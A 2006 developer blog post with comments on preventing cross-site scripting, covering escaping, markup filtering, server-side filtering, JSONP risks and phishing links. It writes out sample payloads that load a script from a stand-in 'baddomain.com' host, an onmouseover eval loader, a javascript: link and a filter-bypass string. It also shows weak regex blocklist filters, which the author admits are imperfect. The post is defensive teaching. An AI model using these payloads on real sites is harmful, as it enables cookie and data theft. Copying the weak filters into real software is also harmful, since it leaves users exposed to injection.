Preventing Cross Site Scripting Attacks
Posted by gmurray71 on September 27, 2006 at 12:01 PM | Comments (9)
Cross site scripting (XSS) is the injection of JavaScript from an unwanted domain into a page, where it then executes. Such scripts could expose any data in the page that is accessible to JavaScript, including cookies, form data, or content, to a 3rd party. Here is how you can prevent your web pages from being exploited on both the client and the server, followed by tips on how to avoid vulnerable sites.
- Escape Parameters and User Input - The safest step you can take is to escape all parameters to a page that are displayed in its content. The same applies to any user input that may be displayed or re-displayed in a web page rendered by a server. The downside is that your users cannot provide markup.
- Remove eval(), javascript:, and script from User Provided Markup - If you allow users to provide markup in any part of your application that is displayed in a page, make sure to remove eval() and javascript: calls from element attributes, including styles, as they can be used to execute JavaScript. Also remove script blocks.
- Filter User Input on the Server - You should always filter user input that is stored or processed on a server, because URLs and GET/POST requests can be created manually.
- Use Caution with Dynamic Script Injection - Be careful when dynamically injecting external scripts to retrieve JSON-based data, as you are potentially exposing everything accessible by JavaScript.
- Avoid XSS Phishing Attacks - Be wary of sites known to contain vulnerabilities and of phishing-style links that carry external script references.
Escape Parameters and User Input
This is the classic XSS attack that can open your service or web application up to hackers. By design, the site displays a user's id that is passed in as a URL parameter. The following script takes the id and displays a welcome message.
<script type="text/javascript">
var start = window.location.href.indexOf("id=");
var stop = window.location.href.length;
var id = "guest";
if (start != -1) {
// skip past "id=" so only the value is displayed
id = decodeURIComponent(window.location.href.substring(start + 3, stop));
}
document.write("Hi " + id);
</script>
A request to the URL index.html?id=greg (assuming the page containing the script is index.html) will result in:
Hi greg
What would happen if instead of "greg" I used the following URL:
index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js%22%3E%3C/script%3E
Notice that the URL above contains a reference to the script http://baddomain.com/badscript.js, which contains malicious code from a different domain. This script is evaluated when the page loads, putting the page and all the data in it at risk.
To prevent these types of attacks, your client code should always escape the "<" and ">" characters in parameters that are displayed or evaluated by JavaScript code.
You can do this with a simple line of code as can be seen in the next example.
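<script type="text/javascript">
var start = window.location.href.indexOf("id=");
var stop = window.location.href.length;
var id = "guest";
if (start != -1) {
id = decodeURIComponent(window.location.href.substring(start + 3, stop));
}
// escape "<" and ">" so the browser renders the value as text instead of markup
id = id.replace(/</g, "&lt;").replace(/>/g, "&gt;");
document.write("Hi " + id);
</script>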
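Escaping only "<" and ">" handles this example, and locating the value with indexOf also matches other parameters whose names contain id, such as uid. The following is a slightly more thorough sketch, assuming a browser (or Node.js) that provides the standard URL API; welcomeMessage and escapeHtml are hypothetical helper names, not part of any library. It reads the parameter by its exact name and also escapes "&", double quotes, and single quotes, which matters whenever a value ends up inside an attribute.

```javascript
// Escape the characters that are significant in HTML text and attribute values.
// "&" is replaced first so the entities produced below are not escaped twice.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Build the greeting from the "id" query parameter of a page URL.
// URLSearchParams percent-decodes the value and matches the exact parameter
// name, so "?uid=5" is not mistaken for "id".
function welcomeMessage(href) {
  const id = new URL(href).searchParams.get("id") || "guest";
  return "Hi " + escapeHtml(id);
}

// In the page itself: document.write(welcomeMessage(window.location.href));
```

With the malicious URL from earlier, the page would display the script tag as harmless text rather than loading badscript.js.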
Consider the following page containing a form where a user enters a description that will be visible to other users.
<html>
<head>
<script type="text/javascript">
function displayName() {
var description = document.getElementById("description").value;
var display = document.getElementById("display");
display.innerHTML = description;
}
</script>
</head>
<body>
<form onsubmit="displayName();return false;">
<textarea id="description" type="text" cols="55" rows="5"></textarea>
<input type="submit" value="Show Description">
</form>
<div id="display"></div>
</body>
</html>
Seems innocent enough, right? Try entering the following content in the text area.
<a onmouseover="eval('s=document.createElement(\'script\'); document.body.appendChild(s); s.src=\'badscript.js\'')">Mouse Over Me</a>
Moving the mouse over the link causes the script badscript.js to be loaded. The injected code could just as easily pass along cookies or any other information as parameters of the "s.src" URL. Unlike the first example, where the user would need to click on a bad link, this type of attack requires only a mouseover to load badscript.js.
So the question now comes to mind: how do you protect your web page from being exploited?
Along with parameters, you should escape form input. If you plan to allow users to provide their own markup, consider the next solution, Remove eval(), javascript:, and script from User Provided Markup.
The following code shows how to escape markup on the client.
<html>
<head>
<script type="text/javascript">
function displayName() {
var description = document.getElementById("description").value;
var display = document.getElementById("display");
description = description.replace(/</g, "&lt;").replace(/>/g, "&gt;");
display.innerHTML = description;
}
</script>
</head>
<body>
<form onsubmit="displayName();return false;">
<textarea id="description" type="text" cols="55" rows="5"></textarea>
<input type="submit" value="Show Description">
</form>
<div id="display"></div>
</body>
</html>
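The line description = description.replace(/</g, "&lt;").replace(/>/g, "&gt;"); converts "<" and ">" into HTML entities, so the browser displays the user input as text instead of interpreting it as markup, which prevents unwanted scripts from being executed.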
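Where users never need to supply markup, an alternative that avoids escaping altogether is to assign to the element's textContent instead of innerHTML. This is a sketch under that assumption; showDescription is a hypothetical replacement for displayName above that takes the two elements as parameters. textContent is supported in current browsers, although very old versions of Internet Explorer used innerText instead.

```javascript
// `input` stands for the <textarea> and `display` for the <div> in the example page.
function showDescription(input, display) {
  // textContent creates a single text node: the browser never parses the value
  // as HTML, so tags and onmouseover attributes are shown as literal characters.
  display.textContent = input.value;
}

// In the page:
// showDescription(document.getElementById("description"),
//                 document.getElementById("display"));
```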
Now that we have looked at how to prevent most attacks, the next section focuses on cases where you want to allow users to provide markup that does not contain malicious code.
Remove eval(), javascript:, and script from User Provided Markup
There may be cases where you want to allow a user to add markup such as links or HTML content that is displayed for other users to see. Consider a blog that allows for HTML markup, user provided URLs, HTML comments, or any other markup. The solution would be to filter all markup before it is displayed in a page or before it is sent to a server or service. The following example shows how to allow for some HTML markup while preventing malicious code.
<html>
<head>
<script type="text/javascript">
function displayName() {
var description = document.getElementById("description").value;
var display = document.getElementById("display");
description = description.replace(/[\"\'][\s]*javascript:(.*)[\"\']/g, "\"\"");
description = description.replace(/script(.*)/g, "");
description = description.replace(/eval\((.*)\)/g, "");
display.innerHTML = description;
}
</script>
</head>
<body>
<form onsubmit="displayName();return false;">
<textarea id="description" type="text" cols="55" rows="5"></textarea>
<input type="submit" value="Show Description">
</form>
<div id="display"></div>
</body>
</html>
The example above removes all eval(), javascript:, and script references that may be entered in the description field. The replacement here is not perfect, as it may also remove legitimate uses of the words javascript and script in the body of a document. You may consider refining the regular expressions to, for example, look only in tag attributes and remove complete script blocks. There are other considerations to keep in mind when filtering client code, such as line breaks, character sets, and case sensitivity, all of which are commonly exploited in attacks. Because some browsers allow JavaScript calls from CSS styles, you should also search user-provided CSS styles.
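For link attributes such as href, a sturdier approach than searching for javascript: is to allow only a short list of URL schemes. The sketch below assumes the value has already been read from the parsed attribute (for example with getAttribute), because HTML character references such as &#106; are decoded by the parser before the URL is used; isSafeUrl and ALLOWED_SCHEMES are hypothetical choices. Before checking the scheme it removes spaces and control characters, since browsers ignore tabs and newlines inside URLs, and it compares the scheme case-insensitively.

```javascript
// Hypothetical allowlist: extend it deliberately instead of blocking known-bad schemes.
const ALLOWED_SCHEMES = ["http", "https", "mailto"];

function isSafeUrl(value) {
  // Drop spaces and control characters (including tab and newline), which
  // browsers may ignore, so "java\nscript:" is seen as "javascript:".
  const compact = String(value).replace(/[\u0000-\u0020\u007f]/g, "");
  const colon = compact.indexOf(":");
  const firstDelimiter = compact.search(/[\/?#]/);
  // A colon before any "/", "?" or "#" means the value starts with a scheme.
  const hasScheme =
    colon !== -1 && (firstDelimiter === -1 || colon < firstDelimiter);
  if (!hasScheme) {
    return true; // relative URL such as "/blog/post.html" or "page.html"
  }
  // Any scheme, including vbscript: or data:, must match the allowlist exactly.
  return ALLOWED_SCHEMES.includes(compact.slice(0, colon).toLowerCase());
}
```

A filter would drop (or replace with "#") any href or src value for which isSafeUrl returns false.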
Filter User Input on the Server
Most cross site scripting problems are caused by poorly designed clients. Servers can also unwittingly become participants in cross site scripting attacks if they redisplay unfiltered user input. Consider the following example, where a hacker manually makes an HTTP POST request to set the homepage URL to the following.
<a href="javascript:eval('alert(\'bad\')');">Click Me</a>
The URL would be stored as is on the server and would expose any user who clicks it to the JavaScript. The example above seems innocent enough, but consider what would happen if, in place of alert('bad'), the link contained malicious code. To prevent such attacks you should filter user input on the server. The following Java example shows how to use regular expression replacement to filter user input.
String description = request.getParameter("description");
description = description.replaceAll("<", "&lt;").replaceAll(">", "&gt;");
description = description.replaceAll("eval\\((.*)\\)", "");
description = description.replaceAll("[\\\"\\\'][\\s]*javascript:(.*)[\\\"\\\']", "\"\"");
description = description.replaceAll("script", "");
The code above escapes "<" and ">" and removes eval() calls, javascript: calls, and script references. As on the client, the replacement is not perfect, as it may also remove legitimate uses of the words javascript and script in the body of a document. The code may be applied using a servlet, servlet filter, or JSF component, on all input parameters or on a per-parameter basis, depending on how much markup you would like to allow users to provide. You may want to refine the regular expressions to handle more cases, or consider a Java library that specializes in removing malicious code.
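The word-removal lines are the fragile part of the filter above, because a single pass can be defeated by nesting the word inside itself. The sketch below illustrates this in JavaScript, so it can be tried in a browser console, rather than in Java; removeOnce and removeUntilStable are hypothetical names. In the full Java filter the earlier escaping of "<" and ">" would still neutralize this particular payload, which is why escaping remains the main defense. Repeating the removal until the text stops changing closes the nesting trick, but line breaks and encodings still need separate handling.

```javascript
// A payload that nests the word "script" inside itself.
const payload =
  '<scrscriptipt src="http://baddomain.com/badscript.js"></scrscriptipt>';

// One pass, like description.replaceAll("script", "") in the Java example.
function removeOnce(input) {
  return input.replace(/script/g, "");
}

// Repeat the removal until the output stops changing, so removing one
// occurrence cannot splice together a new one. The "i" flag also catches
// mixed-case variants such as "ScRiPt".
function removeUntilStable(input) {
  let previous;
  let current = input;
  do {
    previous = current;
    current = current.replace(/script/gi, "");
  } while (current !== previous);
  return current;
}

console.log(removeOnce(payload));
// <script src="http://baddomain.com/bad.js"></script>
console.log(removeUntilStable(payload));
// < src="http://baddomain.com/bad.js"></>
```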
Use Caution with Dynamic Script Injection
Dynamic script injection to retrieve JSON data (also known as JSONP) can be powerful and useful, as it decouples your client from the server of origin. There is still some debate over JSONP, since some consider it a hack or a security hole: when you dynamically include a reference to a 3rd party script, you give that script full access to everything in your page. That script could go on to inject other scripts or do pretty much whatever it wanted.
If you choose to use JSONP, make sure you trust the site you are interacting with. Nothing stops a JSONP provider from including unwanted script along with the JSONP data. One alternative is to provide a proxy service whose output you control, to which you can restrict access, and which can cache responses as needed.
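The following is a minimal sketch of a check such a proxy could perform, written in JavaScript (for example for a Node.js server) and assuming the proxy knows the callback name it asked the provider to use. parseJsonpResponse is a hypothetical helper. It accepts only a callbackName(...) wrapper and hands the inner text to JSON.parse, which accepts data but rejects any function call or statement, so extra script appended by the provider causes the response to be rejected rather than forwarded.

```javascript
// Hypothetical proxy-side helper: unwrap a JSONP response and keep only the data.
function parseJsonpResponse(body, callbackName) {
  let text = body.trim();
  // Allow an optional trailing semicolon after the call.
  if (text.endsWith(";")) {
    text = text.slice(0, -1).trimEnd();
  }
  const prefix = callbackName + "(";
  if (!text.startsWith(prefix) || !text.endsWith(")")) {
    throw new Error("Response is not a call to " + callbackName);
  }
  // JSON.parse throws a SyntaxError on anything that is not pure JSON data,
  // including extra statements smuggled in after the data.
  return JSON.parse(text.slice(prefix.length, -1));
}

const data = parseJsonpResponse('handleData({"items": [1, 2, 3]});', "handleData");
console.log(data.items.length); // 3

try {
  parseJsonpResponse('handleData({"items": []});document.write("x")', "handleData");
} catch (e) {
  console.log("rejected:", e.name); // rejected: SyntaxError
}
```

The proxy would then return the parsed object to the page as plain JSON, which the page can read with XMLHttpRequest and JSON.parse instead of a dynamically injected script tag.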
Avoid XSS Phishing Attacks
This next recommendation focuses on protecting yourself as a user from a site that is vulnerable to cross site scripting attacks.
Phishing attacks, in which what appears to be a valid URL links to a fraudulent web page whose purpose is to collect a user's data, are nothing new to the web. A related attack uses a URL to a legitimate site that has a cross site scripting vulnerability, with a script reference embedded in the URL. Such a link may appear in an email message, a blog posting or comment, or other user-generated content that contains a URL. Clicking it would cause a 3rd party script to be included in the page the vulnerable site returns, which could expose your password, user id, or any other data. Consider the following example:
<a href="http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js%22%3E%3C/script%3E">See foobar</a>
A quick look at the URL shows it references the site http://foobar.com/index.html. An unsuspecting user may not see the script included as a parameter later in the URL.
It is also wise to always look carefully at URLs and the parameters provided with them. A link's URL normally appears in your browser's status bar when you hover over it, so check it for external script references. If a link is suspect, another option is to type the address into your browser's URL bar yourself.
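The same inspection can be automated, for example in a mail filter or a link-checking tool. The sketch below is a heuristic under that assumption, not a guarantee (double-encoded values such as %253C would slip past it); findSuspiciousParams is a hypothetical helper built on the standard URL API. It decodes each query parameter and reports those that contain a script tag or a javascript: URL.

```javascript
// Hypothetical helper: list query parameters whose decoded value looks like
// script markup or a javascript: URL.
function findSuspiciousParams(href) {
  const suspicious = [];
  // URLSearchParams percent-decodes each value, so "%3Cscript" is seen as "<script".
  for (const [name, value] of new URL(href).searchParams) {
    if (/<\s*script|javascript\s*:/i.test(value)) {
      suspicious.push(name);
    }
  }
  return suspicious;
}

console.log(findSuspiciousParams(
  "http://foobar.com/index.html?id=%3Cscript%20src=%22http://baddomain.com/badscript.js%22%3E%3C/script%3E"
)); // [ 'id' ]
console.log(findSuspiciousParams("http://foobar.com/index.html?id=greg")); // []
```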
Be aware of sites known to have vulnerabilities and be very careful with any personal data you provide those sites.
While JavaScript-based interfaces can be very flexible, you need to be very careful with all user-provided input, whether it comes as parameters or form data. Always make sure to escape or filter input on both the client and the server. As a user, you should be cautious not to become a victim of a vulnerable site. It's better to be safe than in the news!
What other things do you do to prevent XSS attacks?
Comments
-
It’s not enough to just remove javascript:; the MySpace worm had a newline between java and script: and IE still accepted it.
Don’t underestimate the creativity of people trying to get around regular-expression based input filtering. In my opinion, if you're accepting more than plain text, the only way to actually be safe is to parse all the HTML and CSS yourself, accept only a small, valid subset of values, and recreate the output from the parsed objects. This also lets you use something like TagSoup to convert random user-entered HTML to valid XHTML.
Make sure you get the encoding right, too. If the browser thinks the page looks like Shift-JIS instead of ISO-8859-1 (for example), it might interpret safe code incorrectly. Always set the charset to UTF-8 in the <%@page contentType=...%>, and use a character encoding filter to set it in the request.
Posted by: nzcarey on September 27, 2006 at 03:54 PM
-
Content type and new line hacks are something I did not dive into much here. I totally agree with nzcarey that you should also keep these things in mind. The safest choice, of course, would be to allow no user-generated markup at all. Thank you nzcarey for the comments!
Posted by: gmurray71 on September 27, 2006 at 04:03 PM
-
Very informative. Thanks.
Posted by: johanley on September 28, 2006 at 08:28 AM
-
consider a Java library built that specializes in removing malicious code
Do you know of any such libraries?
Posted by: dnewfield on January 04, 2007 at 10:45 PM
-
There is some information on the Open Web Application Security Project, with some source code examples, but nothing all-inclusive yet.
Posted by: gmurray71 on January 05, 2007 at 12:28 AM
-
Good information. I'd argue, however, that input should not be modified AT time of input, but that it should be preserved and later modified to escape ONLY for the purpose they are about to be used. Thus it really should not be "user input", but rather ANY input into an operation should be considered for escaping. If user input is taken and used for SQL and then later taken to be used for HTML, it should be escaped for the appropriate operation AT THAT TIME. I find people escape once for one purpose, and then forget that the input may not have been escaped for another (SQL vs HTML output vs. ???). Understand your trust boundaries. :)
Posted by: asleeis on January 12, 2007 at 03:16 PM
-
I agree, all input should be validated. This would include any requests to services as well.
Preserving things as is could have its benefits, so long as everyone working with the data from that database is aware of the escaping. If you had other developers in your organization using that data, you could get bitten.
Posted by: gmurray71 on January 12, 2007 at 03:23 PM
-
OK, so now I've built pretty much exactly what you've described: a TagSoup parse into XHTML in order to filter and allow through only "safe" content.
But it's still not clear how to do that.
I've effectively built an (incomplete) table of allowed tags and allowed attributes, and I currently walk the dom trimming any that are not explicitly allowed.
Doing that "correctly" means ensuring that my whitelists are accurate and safe. For example, it seems nice to allow style attributes, but is that safe? In order to allow CSS, maybe class attributes, but is id necessary? Don't I then have to worry about using any of those "ajax without javascript" .js libraries? Because of those, are there specific class attribute values I should disallow?
It is clear that this filter is insufficient. For example, I want to allow links, so href must be allowed in <a/> tags, but clearly I don't want to allow that to be used as a way to trigger javascript so I must explicitly check the content of this attribute. That brings us right back to an ad-hoc collection of unescapeHtml/indexOf searches (for script, eval, etc.). This seems sloppy and unless carefully maintained likely to lead to XSS vulnerabilities for my users...
Is there an obvious next step that I'm missing? Does anyone have available a table of "safe" tag/attribute combinations? This seems like someplace where I'd rather trust someone with more knowledge/experience than myself. Have only black-hats focused on this problem? Seems ripe for a good open-source tool...
Posted by: dnewfield on January 20, 2007 at 07:04 PM
-
Sorry for the re-post, but the first one was quite hard to read. Here it is again with a bit more formatting (and clarified phrases).
OK, so now I've built pretty much exactly what you've described: a TagSoup parse into XHTML in order to filter and allow through only "safe" content.
But it's still not clear how to do that.
I've effectively built an (incomplete) table of allowed tags and allowed attributes, and I currently walk the DOM trimming any that are not explicitly allowed.
Doing that "correctly" means ensuring that my whitelists are accurate and safe. For example, it seems nice to allow style attributes, but is that safe? In order to allow CSS, maybe class attributes should be allowed, but are id attributes necessary? Don't I then have to worry about using any of those "ajax without javascript" .js libraries? Because of those, are there specific class attribute values I should disallow?
It is clear that this filter is insufficient. For example, I want to allow links, so href must be allowed in <a/> tags, but clearly I don't want to allow that to be used as a way to trigger javascript so I must explicitly check the content of this attribute. That brings us right back to an ad-hoc collection of unescapeHtml/indexOf searches (for script, eval, etc.). This seems sloppy and unless carefully maintained likely to lead to XSS vulnerabilities for my users...
Is there an obvious next step that I'm missing? Does anyone have available a table of "safe" tag/attribute combinations? This seems like someplace where I'd rather trust someone with more knowledge/experience than myself. Have only black-hats focused on this problem? Seems ripe ground for a good open-source (white-hat) tool...
Posted by: dnewfield on January 23, 2007 at 09:25 AM